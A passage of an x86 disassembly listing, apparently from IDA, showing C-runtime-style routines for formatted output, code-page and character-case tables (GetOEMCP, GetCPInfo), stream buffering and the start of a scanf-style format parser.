short loc_41FC33 ; --------------------------------------------------------------------------- loc_41FC7E: ; CODE XREF: sub_41F69F+5A2j lea eax, [ebp+var_49] sub eax, [ebp+var_8] inc [ebp+var_8] test byte ptr [ebp+var_4+1], 2 mov [ebp+var_C], eax jz short loc_41FCA9 mov ecx, [ebp+var_8] cmp byte ptr [ecx], 30h jnz short loc_41FC9C test eax, eax jnz short loc_41FCA9 loc_41FC9C: ; CODE XREF: sub_41F69F+5F7j dec [ebp+var_8] inc eax mov ecx, [ebp+var_8] mov byte ptr [ecx], 30h loc_41FCA6: ; CODE XREF: sub_41F69F+35Fj ; sub_41F69F+406j ... mov [ebp+var_C], eax loc_41FCA9: ; CODE XREF: sub_41F69F+21Bj ; sub_41F69F+2FDj ... cmp [ebp+var_28], 0 jnz loc_41FDA7 ; default mov ebx, [ebp+var_4] test bl, 40h jz short loc_41FCE1 test bh, 1 jz short loc_41FCC6 mov [ebp+var_16], 2Dh jmp short loc_41FCDA ; --------------------------------------------------------------------------- loc_41FCC6: ; CODE XREF: sub_41F69F+61Fj test bl, 1 jz short loc_41FCD1 mov [ebp+var_16], 2Bh jmp short loc_41FCDA ; --------------------------------------------------------------------------- loc_41FCD1: ; CODE XREF: sub_41F69F+62Aj test bl, 2 jz short loc_41FCE1 mov [ebp+var_16], 20h loc_41FCDA: ; CODE XREF: sub_41F69F+625j ; sub_41F69F+630j mov [ebp+var_1C], 1 loc_41FCE1: ; CODE XREF: sub_41F69F+61Aj ; sub_41F69F+635j mov esi, [ebp+var_20] sub esi, [ebp+var_1C] sub esi, [ebp+var_C] test bl, 0Ch jnz short loc_41FD01 lea eax, [ebp+var_14] push eax push [ebp+arg_0] push esi push 20h call sub_41FE15 add esp, 10h loc_41FD01: ; CODE XREF: sub_41F69F+64Ej lea eax, [ebp+var_14] push eax lea eax, [ebp+var_16] push [ebp+arg_0] push [ebp+var_1C] push eax call sub_41FE46 add esp, 10h test bl, 8 jz short loc_41FD33 test bl, 4 jnz short loc_41FD33 lea eax, [ebp+var_14] push eax push [ebp+arg_0] push esi push 30h call sub_41FE15 add esp, 10h loc_41FD33: ; CODE XREF: sub_41F69F+67Bj ; sub_41F69F+680j cmp [ebp+var_24], 0 jz short loc_41FD7A cmp [ebp+var_C], 0 jle short loc_41FD7A mov eax, [ebp+var_C] mov ebx, [ebp+var_8] lea edi, [eax-1] loc_41FD48: ; CODE XREF: sub_41F69F+6D7j mov ax, [ebx] inc ebx push eax lea eax, [ebp+var_38] push eax inc ebx call sub_423E5B pop ecx test eax, eax pop ecx jle short loc_41FD8F lea ecx, [ebp+var_14] push ecx push [ebp+arg_0] push eax lea eax, [ebp+var_38] push eax call sub_41FE46 add esp, 10h mov eax, edi dec edi test eax, eax jnz short loc_41FD48 jmp short loc_41FD8F ; --------------------------------------------------------------------------- loc_41FD7A: ; CODE XREF: sub_41F69F+698j ; sub_41F69F+69Ej lea eax, [ebp+var_14] push eax push [ebp+arg_0] push [ebp+var_C] push [ebp+var_8] call sub_41FE46 add esp, 10h loc_41FD8F: ; CODE XREF: sub_41F69F+6BCj ; sub_41F69F+6D9j test byte ptr [ebp+var_4], 4 jz short loc_41FDA7 ; default lea eax, [ebp+var_14] push eax push [ebp+arg_0] push esi push 20h call sub_41FE15 add esp, 10h loc_41FDA7: ; CODE XREF: sub_41F69F+68j ; sub_41F69F+8Bj ... mov edi, [ebp+arg_4] ; default mov bl, [edi] inc edi test bl, bl mov [ebp+arg_4], edi jnz loc_41F6CB loc_41FDB8: ; CODE XREF: sub_41F69F+1Fj ; sub_41F69F+37j mov eax, [ebp+var_14] pop edi pop esi pop ebx leave retn sub_41F69F endp ; --------------------------------------------------------------------------- off_41FDC0 dd offset loc_41F83E ; DATA XREF: sub_41F69F+6Er dd offset loc_41F714 ; jump table for switch statement dd offset loc_41F72F dd offset loc_41F77B dd offset loc_41F7B2 dd offset loc_41F7BA dd offset loc_41F7EF dd offset loc_41F882 ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41FDE0 proc near ; CODE XREF: sub_41F69F+1BDp ; sub_41F69F+1D6p ... arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp mov ecx, [ebp+arg_4] dec dword ptr [ecx+4] js short loc_41FDF9 mov edx, [ecx] mov al, byte ptr [ebp+arg_0] mov [edx], al inc dword ptr [ecx] movzx eax, al jmp short loc_41FE04 ; --------------------------------------------------------------------------- loc_41FDF9: ; CODE XREF: sub_41FDE0+9j push ecx push [ebp+arg_0] call sub_41F58A pop ecx pop ecx loc_41FE04: ; CODE XREF: sub_41FDE0+17j cmp eax, 0FFFFFFFFh mov eax, [ebp+arg_8] jnz short loc_41FE11 or dword ptr [eax], 0FFFFFFFFh pop ebp retn ; --------------------------------------------------------------------------- loc_41FE11: ; CODE XREF: sub_41FDE0+2Aj inc dword ptr [eax] pop ebp retn sub_41FDE0 endp ; =============== S U B R O U T I N E ======================================= sub_41FE15 proc near ; CODE XREF: sub_41F69F+65Ap ; sub_41F69F+68Cp ... arg_0 = dword ptr 4 arg_4 = dword ptr 8 arg_8 = dword ptr 0Ch arg_C = dword ptr 10h push esi push edi mov edi, [esp+8+arg_4] mov eax, edi dec edi test eax, eax jle short loc_41FE43 mov esi, [esp+8+arg_C] loc_41FE26: ; CODE XREF: sub_41FE15+2Cj push esi push [esp+0Ch+arg_8] push [esp+10h+arg_0] call sub_41FDE0 add esp, 0Ch cmp dword ptr [esi], 0FFFFFFFFh jz short loc_41FE43 mov eax, edi dec edi test eax, eax jg short loc_41FE26 loc_41FE43: ; CODE XREF: sub_41FE15+Bj ; sub_41FE15+25j pop edi pop esi retn sub_41FE15 endp ; =============== S U B R O U T I N E ======================================= sub_41FE46 proc near ; CODE XREF: sub_41F69F+670p ; sub_41F69F+6CAp ... arg_0 = dword ptr 4 arg_4 = dword ptr 8 arg_8 = dword ptr 0Ch arg_C = dword ptr 10h push ebx mov ebx, [esp+4+arg_4] mov eax, ebx dec ebx push esi push edi test eax, eax jle short loc_41FE7A mov edi, [esp+0Ch+arg_C] mov esi, [esp+0Ch+arg_0] loc_41FE5C: ; CODE XREF: sub_41FE46+32j movsx eax, byte ptr [esi] push edi inc esi push [esp+10h+arg_8] push eax call sub_41FDE0 add esp, 0Ch cmp dword ptr [edi], 0FFFFFFFFh jz short loc_41FE7A mov eax, ebx dec ebx test eax, eax jg short loc_41FE5C loc_41FE7A: ; CODE XREF: sub_41FE46+Cj ; sub_41FE46+2Bj pop edi pop esi pop ebx retn sub_41FE46 endp ; =============== S U B R O U T I N E ======================================= sub_41FE7E proc near ; CODE XREF: sub_41F69F+E5p ; sub_41F69F+124p ... arg_0 = dword ptr 4 mov eax, [esp+arg_0] add dword ptr [eax], 4 mov eax, [eax] mov eax, [eax-4] retn sub_41FE7E endp ; =============== S U B R O U T I N E ======================================= sub_41FE8B proc near ; CODE XREF: sub_41F69F+4FAp arg_0 = dword ptr 4 mov eax, [esp+arg_0] add dword ptr [eax], 8 mov ecx, [eax] mov eax, [ecx-8] mov edx, [ecx-4] retn sub_41FE8B endp ; =============== S U B R O U T I N E ======================================= sub_41FE9B proc near ; CODE XREF: sub_41F69F+2C7p arg_0 = dword ptr 4 mov eax, [esp+arg_0] add dword ptr [eax], 4 mov eax, [eax] mov ax, [eax-4] retn sub_41FE9B endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41FEA9 proc near ; CODE XREF: sub_42026D+Bp var_18 = dword ptr -18h var_12 = byte ptr -12h var_11 = byte ptr -11h var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 18h push ebx push esi push edi push [ebp+arg_0] call sub_420042 ; GetOEMCP mov esi, eax pop ecx cmp esi, ds:dword_4DCDA4 mov [ebp+arg_0], esi jz loc_420036 xor ebx, ebx cmp esi, ebx jz loc_42002C xor edx, edx mov eax, offset dword_43CC00 loc_41FEDD: ; CODE XREF: sub_41FEA9+41j cmp [eax], esi jz short loc_41FF53 add eax, 30h inc edx cmp eax, offset dword_43CCF0 jl short loc_41FEDD lea eax, [ebp+var_18] push eax push esi call dword_4271CC ; GetCPInfo cmp eax, 1 jnz loc_420024 push 40h xor eax, eax pop ecx mov edi, offset byte_4DCEC0 cmp [ebp+var_18], 1 mov ds:dword_4DCDA4, esi rep stosd stosb mov ds:dword_4DCFC4, ebx jbe loc_420012 cmp [ebp+var_12], 0 jz loc_41FFE8 lea ecx, [ebp+var_11] loc_41FF30: ; CODE XREF: sub_41FEA9+139j mov dl, [ecx] test dl, dl jz loc_41FFE8 movzx eax, byte ptr [ecx-1] movzx edx, dl loc_41FF41: ; CODE XREF: sub_41FEA9+A8j cmp eax, edx ja loc_41FFDC or ds:byte_4DCEC1[eax], 4 inc eax jmp short loc_41FF41 ; --------------------------------------------------------------------------- loc_41FF53: ; CODE XREF: sub_41FEA9+36j push 40h xor eax, eax pop ecx mov edi, offset byte_4DCEC0 rep stosd lea esi, [edx+edx*2] mov [ebp+var_4], ebx shl esi, 4 stosb lea ebx, dword_43CC10[esi] loc_41FF6F: ; CODE XREF: sub_41FEA9+103j cmp byte ptr [ebx], 0 mov ecx, ebx jz short loc_41FFA2 loc_41FF76: ; CODE XREF: sub_41FEA9+F7j mov dl, [ecx+1] test dl, dl jz short loc_41FFA2 movzx eax, byte ptr [ecx] movzx edi, dl cmp eax, edi ja short loc_41FF9B mov edx, [ebp+var_4] mov dl, byte_43CBF8[edx] loc_41FF90: ; CODE XREF: sub_41FEA9+F0j or ds:byte_4DCEC1[eax], dl inc eax cmp eax, edi jbe short loc_41FF90 loc_41FF9B: ; CODE XREF: sub_41FEA9+DCj inc ecx inc ecx cmp byte ptr [ecx], 0 jnz short loc_41FF76 loc_41FFA2: ; CODE XREF: sub_41FEA9+CBj ; sub_41FEA9+D2j inc [ebp+var_4] add ebx, 8 cmp [ebp+var_4], 4 jb short loc_41FF6F mov eax, [ebp+arg_0] mov ds:dword_4DCDBC, 1 push eax mov ds:dword_4DCDA4, eax call sub_42008C lea esi, dword_43CC04[esi] mov edi, offset dword_4DCDB0 movsd movsd pop ecx mov ds:dword_4DCFC4, eax movsd jmp short loc_420031 ; --------------------------------------------------------------------------- loc_41FFDC: ; CODE XREF: sub_41FEA9+9Aj inc ecx inc ecx cmp byte ptr [ecx-1], 0 jnz loc_41FF30 loc_41FFE8: ; CODE XREF: sub_41FEA9+7Ej ; sub_41FEA9+8Bj push 1 pop eax loc_41FFEB: ; CODE XREF: sub_41FEA9+14Fj or ds:byte_4DCEC1[eax], 8 inc eax cmp eax, 0FFh jb short loc_41FFEB push esi call sub_42008C pop ecx mov ds:dword_4DCFC4, eax mov ds:dword_4DCDBC, 1 jmp short loc_420018 ; --------------------------------------------------------------------------- loc_420012: ; CODE XREF: sub_41FEA9+74j mov ds:dword_4DCDBC, ebx loc_420018: ; CODE XREF: sub_41FEA9+167j xor eax, eax mov edi, offset dword_4DCDB0 stosd stosd stosd jmp short loc_420031 ; --------------------------------------------------------------------------- loc_420024: ; CODE XREF: sub_41FEA9+51j cmp ds:dword_4DB9E0, ebx jz short loc_42003A loc_42002C: ; CODE XREF: sub_41FEA9+27j call sub_4200BF loc_420031: ; CODE XREF: sub_41FEA9+131j ; sub_41FEA9+179j call sub_4200E8 loc_420036: ; CODE XREF: sub_41FEA9+1Dj xor eax, eax jmp short loc_42003D ; --------------------------------------------------------------------------- loc_42003A: ; CODE XREF: sub_41FEA9+181j or eax, 0FFFFFFFFh loc_42003D: ; CODE XREF: sub_41FEA9+18Fj pop edi pop esi pop ebx leave retn sub_41FEA9 endp ; =============== S U B R O U T I N E ======================================= sub_420042 proc near ; CODE XREF: sub_41FEA9+Cp arg_0 = dword ptr 4 mov eax, [esp+arg_0] and ds:dword_4DB9E0, 0 cmp eax, 0FFFFFFFEh jnz short loc_420062 mov ds:dword_4DB9E0, 1 jmp dword_427060 ; --------------------------------------------------------------------------- loc_420062: ; CODE XREF: sub_420042+Ej cmp eax, 0FFFFFFFDh jnz short loc_420077 mov ds:dword_4DB9E0, 1 jmp dword_4271D0 ; --------------------------------------------------------------------------- loc_420077: ; CODE XREF: sub_420042+23j cmp eax, 0FFFFFFFCh jnz short locret_42008B mov eax, ds:dword_4DBA24 mov ds:dword_4DB9E0, 1 locret_42008B: ; CODE XREF: sub_420042+38j retn sub_420042 endp ; =============== S U B R O U T I N E ======================================= sub_42008C proc near ; CODE XREF: sub_41FEA9+118p ; sub_41FEA9+152p arg_0 = dword ptr 4 mov eax, [esp+arg_0] sub eax, 3A4h jz short loc_4200B9 sub eax, 4 jz short loc_4200B3 sub eax, 0Dh jz short loc_4200AD dec eax jz short loc_4200A7 xor eax, eax retn ; --------------------------------------------------------------------------- loc_4200A7: ; CODE XREF: sub_42008C+16j mov eax, 404h retn ; --------------------------------------------------------------------------- loc_4200AD: ; CODE XREF: sub_42008C+13j mov eax, 412h retn ; --------------------------------------------------------------------------- loc_4200B3: ; CODE XREF: sub_42008C+Ej mov eax, 804h retn ; --------------------------------------------------------------------------- loc_4200B9: ; CODE XREF: sub_42008C+9j mov eax, 411h retn sub_42008C endp ; =============== S U B R O U T I N E ======================================= sub_4200BF proc near ; CODE XREF: sub_41FEA9:loc_42002Cp push edi push 40h pop ecx xor eax, eax mov edi, offset byte_4DCEC0 rep stosd stosb xor eax, eax mov edi, offset dword_4DCDB0 mov ds:dword_4DCDA4, eax mov ds:dword_4DCDBC, eax mov ds:dword_4DCFC4, eax stosd stosd stosd pop edi retn sub_4200BF endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4200E8 proc near ; CODE XREF: sub_41FEA9:loc_420031p var_514 = byte ptr -514h var_314 = byte ptr -314h var_214 = byte ptr -214h var_114 = byte ptr -114h var_14 = byte ptr -14h var_E = byte ptr -0Eh var_D = byte ptr -0Dh push ebp mov ebp, esp sub esp, 514h lea eax, [ebp+var_14] push esi push eax push ds:dword_4DCDA4 call dword_4271CC ; GetCPInfo cmp eax, 1 jnz loc_420221 xor eax, eax mov esi, 100h loc_420112: ; CODE XREF: sub_4200E8+34j mov [ebp+eax+var_114], al inc eax cmp eax, esi jb short loc_420112 mov al, [ebp+var_E] mov [ebp+var_114], 20h test al, al jz short loc_420163 push ebx push edi lea edx, [ebp+var_D] loc_420131: ; CODE XREF: sub_4200E8+77j movzx ecx, byte ptr [edx] movzx eax, al cmp eax, ecx ja short loc_420158 sub ecx, eax lea edi, [ebp+eax+var_114] inc ecx mov eax, 20202020h mov ebx, ecx shr ecx, 2 rep stosd mov ecx, ebx and ecx, 3 rep stosb loc_420158: ; CODE XREF: sub_4200E8+51j inc edx inc edx mov al, [edx-1] test al, al jnz short loc_420131 pop edi pop ebx loc_420163: ; CODE XREF: sub_4200E8+42j push 0 lea eax, [ebp+var_514] push ds:dword_4DCFC4 push ds:dword_4DCDA4 push eax lea eax, [ebp+var_114] push esi push eax push 1 call sub_423CEC push 0 lea eax, [ebp+var_214] push ds:dword_4DCDA4 push esi push eax lea eax, [ebp+var_114] push esi push eax push esi push ds:dword_4DCFC4 call sub_422ACA push 0 lea eax, [ebp+var_314] push ds:dword_4DCDA4 push esi push eax lea eax, [ebp+var_114] push esi push eax push 200h push ds:dword_4DCFC4 call sub_422ACA add esp, 5Ch xor eax, eax lea ecx, [ebp+var_514] loc_4201DE: ; CODE XREF: sub_4200E8+135j mov dx, [ecx] test dl, 1 jz short loc_4201FC or ds:byte_4DCEC1[eax], 10h mov dl, [ebp+eax+var_214] loc_4201F4: ; CODE XREF: sub_4200E8+127j mov ds:byte_4DCDC0[eax], dl jmp short loc_420218 ; --------------------------------------------------------------------------- loc_4201FC: ; CODE XREF: sub_4200E8+FCj test dl, 2 jz short loc_420211 or ds:byte_4DCEC1[eax], 20h mov dl, [ebp+eax+var_314] jmp short loc_4201F4 ; --------------------------------------------------------------------------- loc_420211: ; CODE XREF: sub_4200E8+117j and ds:byte_4DCDC0[eax], 0 loc_420218: ; CODE XREF: sub_4200E8+112j inc eax inc ecx inc ecx cmp eax, esi jb short loc_4201DE jmp short loc_42026A ; --------------------------------------------------------------------------- loc_420221: ; CODE XREF: sub_4200E8+1Dj xor eax, eax mov esi, 100h loc_420228: ; CODE XREF: sub_4200E8+180j cmp eax, 41h jb short loc_420246 cmp eax, 5Ah ja short loc_420246 or ds:byte_4DCEC1[eax], 10h mov cl, al add cl, 20h loc_42023E: ; CODE XREF: sub_4200E8+174j mov ds:byte_4DCDC0[eax], cl jmp short loc_420265 ; --------------------------------------------------------------------------- loc_420246: ; CODE XREF: sub_4200E8+143j ; sub_4200E8+148j cmp eax, 61h jb short loc_42025E cmp eax, 7Ah ja short loc_42025E or ds:byte_4DCEC1[eax], 20h mov cl, al sub cl, 20h jmp short loc_42023E ; --------------------------------------------------------------------------- loc_42025E: ; CODE XREF: sub_4200E8+161j ; sub_4200E8+166j and ds:byte_4DCDC0[eax], 0 loc_420265: ; CODE XREF: sub_4200E8+15Cj inc eax cmp eax, esi jb short loc_420228 loc_42026A: ; CODE XREF: sub_4200E8+137j pop esi leave retn sub_4200E8 endp ; =============== S U B R O U T I N E ======================================= sub_42026D proc near ; CODE XREF: sub_422E72+9p ; sub_422ECA+Dp ... cmp ds:dword_4DCFF4, 0 jnz short locret_420288 push 0FFFFFFFDh call sub_41FEA9 pop ecx mov ds:dword_4DCFF4, 1 locret_420288: ; CODE XREF: sub_42026D+7j retn sub_42026D endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_420289 proc near ; CODE XREF: sub_41B9D1+2Bp ; sub_41B9D1+A6p ... arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp cmp ds:dword_4DCDBC, 0 push edi mov edi, [ebp+arg_0] mov [ebp+arg_0], edi jnz short loc_4202AD push [ebp+arg_8] push [ebp+arg_4] push edi call sub_41B5F0 add esp, 0Ch jmp short loc_420310 ; --------------------------------------------------------------------------- loc_4202AD: ; CODE XREF: sub_420289+11j mov edx, [ebp+arg_8] push esi test edx, edx jz short loc_4202F2 mov ecx, [ebp+arg_4] loc_4202B8: ; CODE XREF: sub_420289+5Bj mov al, [ecx] dec edx movzx esi, al test ds:byte_4DCEC1[esi], 4 mov [edi], al jz short loc_4202DC inc edi inc ecx test edx, edx jz short loc_4202E8 mov al, [ecx] dec edx mov [edi], al inc edi inc ecx test al, al jz short loc_4202EE jmp short loc_4202E2 ; --------------------------------------------------------------------------- loc_4202DC: ; CODE XREF: sub_420289+3Ej inc edi inc ecx test al, al jz short loc_4202F2 loc_4202E2: ; CODE XREF: sub_420289+51j test edx, edx jnz short loc_4202B8 jmp short loc_4202F2 ; --------------------------------------------------------------------------- loc_4202E8: ; CODE XREF: sub_420289+44j and byte ptr [edi-1], 0 jmp short loc_4202F2 ; --------------------------------------------------------------------------- loc_4202EE: ; CODE XREF: sub_420289+4Fj and byte ptr [edi-2], 0 loc_4202F2: ; CODE XREF: sub_420289+2Aj ; sub_420289+57j ... mov eax, edx dec edx test eax, eax pop esi jz short loc_42030D lea ecx, [edx+1] xor eax, eax mov edx, ecx shr ecx, 2 rep stosd mov ecx, edx and ecx, 3 rep stosb loc_42030D: ; CODE XREF: sub_420289+6Fj mov eax, [ebp+arg_0] loc_420310: ; CODE XREF: sub_420289+22j pop edi pop ebp retn sub_420289 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_420313 proc near ; CODE XREF: sub_41BBBD+12Bp var_4 = byte ptr -4 var_3 = byte ptr -3 arg_0 = dword ptr 8 push ebp mov ebp, esp push ecx cmp ds:dword_4DBA14, 0 push ebx jnz short loc_42033E mov eax, [ebp+arg_0] cmp eax, 61h jl loc_4203DC cmp eax, 7Ah jg loc_4203DC sub eax, 20h jmp loc_4203DC ; --------------------------------------------------------------------------- loc_42033E: ; CODE XREF: sub_420313+Cj mov ebx, [ebp+arg_0] cmp ebx, 100h jge short loc_420371 cmp dword_43CBE4, 1 jle short loc_42035E push 2 push ebx call sub_41F515 pop ecx pop ecx jmp short loc_420369 ; --------------------------------------------------------------------------- loc_42035E: ; CODE XREF: sub_420313+3Dj mov eax, off_43C9D8 mov al, [eax+ebx*2] and eax, 2 loc_420369: ; CODE XREF: sub_420313+49j test eax, eax jnz short loc_420371 loc_42036D: ; CODE XREF: sub_420313+AFj mov eax, ebx jmp short loc_4203DC ; --------------------------------------------------------------------------- loc_420371: ; CODE XREF: sub_420313+34j ; sub_420313+58j mov edx, off_43C9D8 mov eax, ebx sar eax, 8 movzx ecx, al test byte ptr [edx+ecx*2+1], 80h jz short loc_420394 and byte ptr [ebp+arg_0+2], 0 mov byte ptr [ebp+arg_0], al mov byte ptr [ebp+arg_0+1], bl push 2 jmp short loc_42039D ; --------------------------------------------------------------------------- loc_420394: ; CODE XREF: sub_420313+71j and byte ptr [ebp+arg_0+1], 0 mov byte ptr [ebp+arg_0], bl push 1 loc_42039D: ; CODE XREF: sub_420313+7Fj pop eax lea ecx, [ebp+var_4] push 1 push 0 push 3 push ecx push eax lea eax, [ebp+arg_0] push eax push 200h push ds:dword_4DBA14 call sub_422ACA add esp, 20h test eax, eax jz short loc_42036D cmp eax, 1 jnz short loc_4203CF movzx eax, [ebp+var_4] jmp short loc_4203DC ; --------------------------------------------------------------------------- loc_4203CF: ; CODE XREF: sub_420313+B4j movzx eax, [ebp+var_3] movzx ecx, [ebp+var_4] shl eax, 8 or eax, ecx loc_4203DC: ; CODE XREF: sub_420313+14j ; sub_420313+1Dj ... pop ebx leave retn sub_420313 endp ; =============== S U B R O U T I N E ======================================= sub_4203DF proc near ; CODE XREF: sub_41BDDC+1Dp ; sub_41D3BE+16p ... arg_0 = dword ptr 4 mov ecx, [esp+arg_0] xor edx, edx mov ds:dword_4DB95C, ecx mov eax, offset dword_43CCF0 loc_4203F0: ; CODE XREF: sub_4203DF+1Ej cmp ecx, [eax] jz short loc_420414 add eax, 8 inc edx cmp eax, offset dword_43CE58 jl short loc_4203F0 cmp ecx, 13h jb short loc_420421 cmp ecx, 24h ja short loc_420421 mov ds:dword_4DB958, 0Dh retn ; --------------------------------------------------------------------------- loc_420414: ; CODE XREF: sub_4203DF+13j mov eax, dword_43CCF4[edx*8] mov ds:dword_4DB958, eax retn ; --------------------------------------------------------------------------- loc_420421: ; CODE XREF: sub_4203DF+23j ; sub_4203DF+28j cmp ecx, 0BCh jb short loc_42043B cmp ecx, 0CAh mov ds:dword_4DB958, 8 jbe short locret_420445 loc_42043B: ; CODE XREF: sub_4203DF+48j mov ds:dword_4DB958, 16h locret_420445: ; CODE XREF: sub_4203DF+5Aj retn sub_4203DF endp ; =============== S U B R O U T I N E ======================================= sub_420446 proc near ; CODE XREF: sub_41BE06+8p arg_0 = dword ptr 4 push esi mov esi, [esp+4+arg_0] push dword ptr [esi+10h] call sub_423E35 test eax, eax pop ecx jz short loc_4204CF cmp esi, offset dword_43D0E8 jnz short loc_420464 xor eax, eax jmp short loc_42046F ; --------------------------------------------------------------------------- loc_420464: ; CODE XREF: sub_420446+18j cmp esi, offset dword_43D108 jnz short loc_4204CF push 1 pop eax loc_42046F: ; CODE XREF: sub_420446+1Cj inc ds:dword_4DBB40 test word ptr [esi+0Ch], 10Ch jnz short loc_4204CF cmp ds:dword_4DB9E4[eax*4], 0 push ebx push edi lea edi, ds:4DB9E4h[eax*4] mov ebx, 1000h jnz short loc_4204B5 push ebx call sub_41B4D5 test eax, eax pop ecx mov [edi], eax jnz short loc_4204B5 lea eax, [esi+14h] push 2 mov [esi+8], eax mov [esi], eax pop eax mov [esi+18h], eax mov [esi+4], eax jmp short loc_4204C2 ; --------------------------------------------------------------------------- loc_4204B5: ; CODE XREF: sub_420446+4Dj ; sub_420446+5Aj mov edi, [edi] mov [esi+18h], ebx mov [esi+8], edi mov [esi], edi mov [esi+4], ebx loc_4204C2: ; CODE XREF: sub_420446+6Dj or word ptr [esi+0Ch], 1102h push 1 pop eax pop edi pop ebx pop esi retn ; --------------------------------------------------------------------------- loc_4204CF: ; CODE XREF: sub_420446+10j ; sub_420446+24j ... xor eax, eax pop esi retn sub_420446 endp ; =============== S U B R O U T I N E ======================================= sub_4204D3 proc near ; CODE XREF: sub_41BE06+24p arg_0 = dword ptr 4 arg_4 = dword ptr 8 cmp [esp+arg_0], 0 push esi jz short loc_4204FD mov esi, [esp+4+arg_4] test byte ptr [esi+0Dh], 10h jz short loc_42050E push esi call sub_41DB8B and byte ptr [esi+0Dh], 0EEh and dword ptr [esi+18h], 0 and dword ptr [esi], 0 and dword ptr [esi+8], 0 pop ecx pop esi retn ; --------------------------------------------------------------------------- loc_4204FD: ; CODE XREF: sub_4204D3+6j mov eax, [esp+4+arg_4] test byte ptr [eax+0Dh], 10h jz short loc_42050E push eax call sub_41DB8B pop ecx loc_42050E: ; CODE XREF: sub_4204D3+10j ; sub_4204D3+32j pop esi retn sub_4204D3 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_420510 proc near ; CODE XREF: sub_41C645+2Ap var_1C4 = byte ptr -1C4h var_1C3 = byte ptr -1C3h var_64 = byte ptr -64h var_59 = byte ptr -59h var_44 = dword ptr -44h var_3E = word ptr -3Eh var_3C = dword ptr -3Ch var_38 = byte ptr -38h var_37 = byte ptr -37h var_35 = byte ptr -35h var_34 = dword ptr -34h var_30 = dword ptr -30h var_2C = dword ptr -2Ch var_28 = dword ptr -28h var_24 = dword ptr -24h var_20 = dword ptr -20h var_1C = dword ptr -1Ch var_18 = byte ptr -18h var_17 = byte ptr -17h var_16 = byte ptr -16h var_15 = byte ptr -15h var_14 = dword ptr -14h var_F = byte ptr -0Fh var_E = byte ptr -0Eh var_D = byte ptr -0Dh var_C = dword ptr -0Ch var_5 = byte ptr -5 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp sub esp, 1C4h and [ebp+var_15], 0 push ebx push esi mov esi, [ebp+arg_4] xor ebx, ebx push edi mov al, [esi] mov [ebp+var_4], ebx test al, al mov [ebp+var_34], ebx jz loc_420F16 mov edi, [ebp+arg_0] jmp short loc_42053F ; --------------------------------------------------------------------------- loc_42053A: ; CODE XREF: sub_420510+9CEj mov edi, [ebp+arg_0] xor ebx, ebx loc_42053F: ; CODE XREF: sub_420510+28j cmp dword_43CBE4, 1 jle short loc_420557 movzx eax, al push 8 push eax call sub_41F515 pop ecx pop ecx jmp short loc_420566 ; --------------------------------------------------------------------------- loc_420557: ; CODE XREF: sub_420510+36j mov ecx, off_43C9D8 movzx eax, al mov al, [ecx+eax*2] and eax, 8 loc_420566: ; CODE XREF: sub_420510+45j cmp eax, ebx jz short loc_4205A0 dec [ebp+var_4] push edi lea eax, [ebp+var_4] push edi push eax call sub_420F9D pop ecx pop ecx push eax call sub_420F86 movzx eax, byte ptr [esi+1] inc esi push eax call sub_41D670 add esp, 0Ch loc_42058E: ; CODE XREF: sub_420510+8Ej test eax, eax jz short loc_4205A0 movzx eax, byte ptr [esi+1] inc esi push eax call sub_41D670 pop ecx jmp short loc_42058E ; --------------------------------------------------------------------------- loc_4205A0: ; CODE XREF: sub_420510+58j ; sub_420510+80j cmp byte ptr [esi], 25h jnz loc_420E82 and [ebp+var_35], 0 and [ebp+var_18], 0 and [ebp+var_17], 0 and [ebp+var_E], 0 and [ebp+var_F], 0 and [ebp+var_16], 0 xor edi, edi and [ebp+var_5], 0 mov [ebp+var_1C], ebx mov [ebp+var_20], ebx mov [ebp+var_C], ebx mov [ebp+var_D], 1 mov [ebp+var_30], ebx loc_4205D7: ; CODE XREF: sub_420510+172j movzx ebx, byte ptr [esi+1] inc esi cmp dword_43CBE4, 1 jle short loc_4205F4 movzx eax, bl push 4 push eax call sub_41F515 pop ecx pop ecx jmp short loc_420603 ; --------------------------------------------------------------------------- loc_4205F4: ; CODE XREF: sub_420510+D3j mov ecx, off_43C9D8 movzx eax, bl mov al, [ecx+eax*2] and eax, 4 loc_420603: ; CODE XREF: sub_420510+E2j test eax, eax jz short loc_420619 mov eax, [ebp+var_C] inc [ebp+var_20] lea eax, [eax+eax*4] lea eax, [ebx+eax*2-30h] mov [ebp+var_C], eax jmp short loc_42067E ; --------------------------------------------------------------------------- loc_420619: ; CODE XREF: sub_420510+F5j cmp ebx, 4Eh jg short loc_42065C jz short loc_42067E cmp ebx, 2Ah jz short loc_420657 cmp ebx, 46h jz short loc_42067E cmp ebx, 49h jz short loc_420639 cmp ebx, 4Ch jnz short loc_42066B inc [ebp+var_D] jmp short loc_42067E ; --------------------------------------------------------------------------- loc_420639: ; CODE XREF: sub_420510+11Dj cmp byte ptr [esi+1], 36h jnz short loc_42066B cmp byte ptr [esi+2], 34h lea eax, [esi+2] jnz short loc_42066B inc [ebp+var_30] and [ebp+var_28], 0 and [ebp+var_24], 0 mov esi, eax jmp short loc_42067E ; --------------------------------------------------------------------------- loc_420657: ; CODE XREF: sub_420510+113j inc [ebp+var_E] jmp short loc_42067E ; --------------------------------------------------------------------------- loc_42065C: ; CODE XREF: sub_420510+10Cj cmp ebx, 68h jz short loc_420678 cmp ebx, 6Ch jz short loc_420670 cmp ebx, 77h jz short loc_420673 loc_42066B: ; CODE XREF: sub_420510+122j ; sub_420510+12Dj ... inc [ebp+var_F] jmp short loc_42067E ; --------------------------------------------------------------------------- loc_420670: ; CODE XREF: sub_420510+154j inc [ebp+var_D] loc_420673: ; CODE XREF: sub_420510+159j inc [ebp+var_5] jmp short loc_42067E ; --------------------------------------------------------------------------- loc_420678: ; CODE XREF: sub_420510+14Fj dec [ebp+var_D] dec [ebp+var_5] loc_42067E: ; CODE XREF: sub_420510+107j ; 